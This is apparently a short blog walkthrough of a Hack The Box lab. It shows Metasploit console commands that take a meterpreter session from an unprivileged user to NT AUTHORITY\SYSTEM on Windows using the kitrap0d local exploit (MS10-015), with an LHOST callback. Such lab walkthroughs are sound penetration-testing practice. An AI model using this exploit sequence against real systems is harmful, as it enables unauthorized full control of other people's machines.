Wednesday, May 20, 2020

[HTB][meterpreter][msfconsole]A walkthrough of Privilege Escalation in Windows

meterpreter > getuid
Neither Administrator nor SYSTEM

meterpreter > cd %TEMP%

meterpreter > background

msf > use exploit/windows/local/ms10_015_kitrap0d

msf > set session 2

msf > set lhost 10.10.XX.XX

msf > run

msf > sessions -i 2

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

No comments:

Post a Comment